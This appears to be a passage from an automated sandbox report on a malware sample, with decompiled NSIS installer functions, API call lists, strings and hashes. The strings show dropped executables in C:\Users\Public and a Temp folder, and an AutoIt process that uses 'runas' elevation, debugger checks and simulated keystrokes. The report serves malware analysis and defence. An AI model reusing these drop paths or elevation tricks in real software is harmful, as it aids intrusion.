                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                                                              			E00405CAE(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                              				int _t11;
                                                                                                                                                                                                              				signed char* _t12;
                                                                                                                                                                                                              				intOrPtr _t18;
                                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				E00406228(0x422158, _a4);
                                                                                                                                                                                                              				_t21 = E00405C59(0x422158);
                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                              					E00406503(_t21);
                                                                                                                                                                                                              					if(( *0x42475c & 0x00000080) == 0) {
                                                                                                                                                                                                              						L5:
                                                                                                                                                                                                              						_t22 = _t21 - 0x422158;
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							_t11 = lstrlenA(0x422158);
                                                                                                                                                                                                              							_push(0x422158);
                                                                                                                                                                                                              							if(_t11 <= _t22) {
                                                                                                                                                                                                              								break;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t12 = E0040659C();
                                                                                                                                                                                                              							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                                                                                                              								E00405C07(0x422158);
                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						E00405BC0();
                                                                                                                                                                                                              						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t18 =  *_t21;
                                                                                                                                                                                                              					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L1:
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}








                                                                                                                                                                                                              0x00405cba
                                                                                                                                                                                                              0x00405cc5
                                                                                                                                                                                                              0x00405cc9
                                                                                                                                                                                                              0x00405cd0
                                                                                                                                                                                                              0x00405cdc
                                                                                                                                                                                                              0x00405ce8
                                                                                                                                                                                                              0x00405ce8
                                                                                                                                                                                                              0x00405d00
                                                                                                                                                                                                              0x00405d01
                                                                                                                                                                                                              0x00405d08
                                                                                                                                                                                                              0x00405d09
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405cec
                                                                                                                                                                                                              0x00405cf3
                                                                                                                                                                                                              0x00405cfb
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405cf3
                                                                                                                                                                                                              0x00405d0b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405d1f
                                                                                                                                                                                                              0x00405cde
                                                                                                                                                                                                              0x00405ce2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405ce2
                                                                                                                                                                                                              0x00405ccb
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                                                                                                                                                                                                • Part of subcall function 00405C59: CharNextA.USER32(?), ref: 00405C67
                                                                                                                                                                                                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                                                                                                                                                                                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00422158,00000000,00422158,00422158,76712754,?,766F13E0,00405A10,?,76712754,766F13E0,00000000), ref: 00405D01
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00422158,00422158,00422158,00422158,00422158,00422158,00000000,00422158,00422158,76712754,?,766F13E0,00405A10,?,76712754,766F13E0), ref: 00405D11
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                              • String ID: X!B
                                                                                                                                                                                                              • API String ID: 3248276644-2309198661
                                                                                                                                                                                                              • Opcode ID: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                                                                                                                                                                                              • Instruction ID: 810c58eff44cea92ea74d6fc536401bd0fed09a955b2fb282e84a1b8880da462
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31F0F921109F5125E62232761D09B9F1E54CD97324745457FF8A1B23D2CB3C8853DD6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                                                              			E0040610F(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                                              				long _t21;
                                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                                              				char* _t30;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                                              				_v8 = 0x400;
                                                                                                                                                                                                              				_t21 = E004060AE(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                                                                                                                                              				_t30 = _a16;
                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                              					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                                                                                                                                              					_t21 = RegCloseKey(_a20);
                                                                                                                                                                                                              					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                                                                                                                                                                              					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t21;
                                                                                                                                                                                                              			}







                                                                                                                                                                                                              0x0040611d
                                                                                                                                                                                                              0x0040611f
                                                                                                                                                                                                              0x00406137
                                                                                                                                                                                                              0x0040613c
                                                                                                                                                                                                              0x00406141
                                                                                                                                                                                                              0x0040617e
                                                                                                                                                                                                              0x0040617e
                                                                                                                                                                                                              0x00406143
                                                                                                                                                                                                              0x00406155
                                                                                                                                                                                                              0x00406160
                                                                                                                                                                                                              0x00406166
                                                                                                                                                                                                              0x00406170
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406170
                                                                                                                                                                                                              0x00406183

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,00420530,?,?,?,00000002,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,?,004063C4,80000002), ref: 00406155
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,?,00420530), ref: 00406160
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p, xrefs: 00406112, 00406146
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
                                                                                                                                                                                                              • API String ID: 3356406503-3835738143
                                                                                                                                                                                                              • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                                                                              • Instruction ID: a564c047acf5d73f9aa125f5b2549426a44a408a2c37113ac8a3848fd8f43ee5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B015A72500209BBDF228F61CC0AFDB3BA8EF55364F01403AF95AA6191D678D964DBA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00405C07(char* _a4) {
                                                                                                                                                                                                              				char* _t3;
                                                                                                                                                                                                              				char* _t5;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t5 = _a4;
                                                                                                                                                                                                              				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                                                                                                                                              				while( *_t3 != 0x5c) {
                                                                                                                                                                                                              					_t3 = CharPrevA(_t5, _t3);
                                                                                                                                                                                                              					if(_t3 > _t5) {
                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					break;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				 *_t3 =  *_t3 & 0x00000000;
                                                                                                                                                                                                              				return  &(_t3[1]);
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x00405c08
                                                                                                                                                                                                              0x00405c12
                                                                                                                                                                                                              0x00405c14
                                                                                                                                                                                                              0x00405c1b
                                                                                                                                                                                                              0x00405c23
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405c23
                                                                                                                                                                                                              0x00405c25
                                                                                                                                                                                                              0x00405c2a

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402F5D,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405C0D
                                                                                                                                                                                                              • CharPrevA.USER32(80000000,00000000), ref: 00405C1B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                                                                                              • String ID: C:\Users\Public
                                                                                                                                                                                                              • API String ID: 2709904686-2272764151
                                                                                                                                                                                                              • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                                                                                                                              • Instruction ID: 741041d8a9fca0cd730fa631f59021aaf6e5318b071c559ffeb457c432b97b3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09D0C77241DA706EF70363149D05B9F6A48DF57700F1A44A6E581A6191C77C4C524BFD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00405D26(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                                              				int _t12;
                                                                                                                                                                                                              				int _t14;
                                                                                                                                                                                                              				int _t15;
                                                                                                                                                                                                              				CHAR* _t17;
                                                                                                                                                                                                              				CHAR* _t27;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t12 = lstrlenA(_a8);
                                                                                                                                                                                                              				_t27 = _a4;
                                                                                                                                                                                                              				_v8 = _t12;
                                                                                                                                                                                                              				while(lstrlenA(_t27) >= _v8) {
                                                                                                                                                                                                              					_t14 = _v8;
                                                                                                                                                                                                              					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                                                                                                              					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                                                                                                              					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                              						_t17 = _t27;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t27 = CharNextA(_t27);
                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                              					return _t17;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t17 = 0;
                                                                                                                                                                                                              				goto L5;
                                                                                                                                                                                                              			}









                                                                                                                                                                                                              0x00405d36
                                                                                                                                                                                                              0x00405d38
                                                                                                                                                                                                              0x00405d3b
                                                                                                                                                                                                              0x00405d67
                                                                                                                                                                                                              0x00405d40
                                                                                                                                                                                                              0x00405d49
                                                                                                                                                                                                              0x00405d4e
                                                                                                                                                                                                              0x00405d59
                                                                                                                                                                                                              0x00405d5c
                                                                                                                                                                                                              0x00405d78
                                                                                                                                                                                                              0x00405d5e
                                                                                                                                                                                                              0x00405d65
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405d65
                                                                                                                                                                                                              0x00405d71
                                                                                                                                                                                                              0x00405d75
                                                                                                                                                                                                              0x00405d75
                                                                                                                                                                                                              0x00405d6f
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00405D5F
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                                              • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                                                                                                                                              • Instruction ID: 00b114ba7cac9785f06d25343f2ff2c8ce87c9cf7580b170eb884579fc1bcc0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45F0F631100818BFCB02DFA4CD04D9EBBA8EF55354B2580BBE840FB210D634DE01AFA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00BE5EE2
                                                                                                                                                                                                              • FindWindowW.USER32 ref: 00C210D7
                                                                                                                                                                                                              • IsIconic.USER32(?), ref: 00C210E0
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000009), ref: 00C210ED
                                                                                                                                                                                                              • SetForegroundWindow.USER32 ref: 00C210F7
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C2110D
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C21114
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C21120
                                                                                                                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C21131
                                                                                                                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C21139
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C21141
                                                                                                                                                                                                              • SetForegroundWindow.USER32 ref: 00C21144
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C21159
                                                                                                                                                                                                              • keybd_event.USER32 ref: 00C21164
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2116E
                                                                                                                                                                                                              • keybd_event.USER32 ref: 00C21173
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2117C
                                                                                                                                                                                                              • keybd_event.USER32 ref: 00C21181
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2118B
                                                                                                                                                                                                              • keybd_event.USER32 ref: 00C21190
                                                                                                                                                                                                              • SetForegroundWindow.USER32 ref: 00C21193
                                                                                                                                                                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 00C211BA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                                                              • API String ID: 4125248594-2988720461
                                                                                                                                                                                                              • Opcode ID: cbfd6dd74efbf7b945288978b8569e8ff19f6aded056590c18e626ce86183661
                                                                                                                                                                                                              • Instruction ID: bac3f2061c528644f0ab250a07adcba24b96927aa5730c92b80868800f02e961
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbfd6dd74efbf7b945288978b8569e8ff19f6aded056590c18e626ce86183661
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA315071A40318BAEB306B629C49F7F3EACEB44B50F244025FE05BA1D1CAF05D51EEA5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BE526C
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00BE527E
                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00BE52E6
                                                                                                                                                                                                                • Part of subcall function 00BE1821: _memmove.LIBCMT ref: 00BE185B
                                                                                                                                                                                                                • Part of subcall function 00BDBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BDBC07
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BE5366
                                                                                                                                                                                                              • MessageBoxA.USER32 ref: 00C20B2E
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00C20B66
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00C20BE9
                                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 00C20BF0
                                                                                                                                                                                                                • Part of subcall function 00BE514C: GetSysColorBrush.USER32 ref: 00BE5156
                                                                                                                                                                                                                • Part of subcall function 00BE514C: LoadCursorW.USER32 ref: 00BE5165
                                                                                                                                                                                                                • Part of subcall function 00BE514C: LoadIconW.USER32 ref: 00BE517C
                                                                                                                                                                                                                • Part of subcall function 00BE514C: LoadIconW.USER32 ref: 00BE518E
                                                                                                                                                                                                                • Part of subcall function 00BE514C: LoadIconW.USER32 ref: 00BE51A0
                                                                                                                                                                                                                • Part of subcall function 00BE514C: LoadImageW.USER32 ref: 00BE51C6
                                                                                                                                                                                                                • Part of subcall function 00BE514C: RegisterClassExW.USER32(?), ref: 00BE521C
                                                                                                                                                                                                                • Part of subcall function 00BE50DB: CreateWindowExW.USER32 ref: 00BE5109
                                                                                                                                                                                                                • Part of subcall function 00BE50DB: CreateWindowExW.USER32 ref: 00BE512A
                                                                                                                                                                                                                • Part of subcall function 00BE50DB: ShowWindow.USER32(00000000), ref: 00BE513E
                                                                                                                                                                                                                • Part of subcall function 00BE50DB: ShowWindow.USER32(00000000), ref: 00BE5147
                                                                                                                                                                                                                • Part of subcall function 00BE59D3: _memset.LIBCMT ref: 00BE59F9
                                                                                                                                                                                                                • Part of subcall function 00BE59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BE5A9E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • runas, xrefs: 00C20BE4
                                                                                                                                                                                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C20B28
                                                                                                                                                                                                              • AutoIt, xrefs: 00C20B23
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                                                                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                              • API String ID: 529118366-2030392706
                                                                                                                                                                                                              • Opcode ID: 1160d61d7eecb02e2fff614749be8f1fedf6a530b1dc51ffef72267d0bc28d64
                                                                                                                                                                                                              • Instruction ID: 15c279615df8acde669cbb81270b443690ee6f0a9d79302d399c05b985db7375
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1160d61d7eecb02e2fff614749be8f1fedf6a530b1dc51ffef72267d0bc28d64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5512470919688EACF21EBB6DC49FFE7BB8AF05344F2001EAF55263162CBB45644C725
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 00BE5D40
                                                                                                                                                                                                                • Part of subcall function 00BE1821: _memmove.LIBCMT ref: 00BE185B
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00C60A18,00000000,00000000,?), ref: 00BE5E07
                                                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000), ref: 00BE5E0E
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(00000000), ref: 00BE5E54
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00BE5E5F
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00BE5E90
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00BE5E9C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1986165174-0
                                                                                                                                                                                                              • Opcode ID: facd60a16a718394889e79d9b04c99a01b098e916431efc1af0e7579672da98c
                                                                                                                                                                                                              • Instruction ID: 1936a5b1af30c879946e94f917ce81abe58527687bbcc6e908688824d2747fef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: facd60a16a718394889e79d9b04c99a01b098e916431efc1af0e7579672da98c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A91E631549BC0DEC731CB7994905ABFFE5AF3A304B984A9ED0D793A02D330A648D769
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BD29F3
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BD1DD6
                                                                                                                                                                                                              • GetSysColor.USER32 ref: 00BD1E2A
                                                                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00BD1E3D
                                                                                                                                                                                                                • Part of subcall function 00BD166C: DefDlgProcW.USER32(?,00000020,?), ref: 00BD16B4
                                                                                                                                                                                                              Memory Dump Source
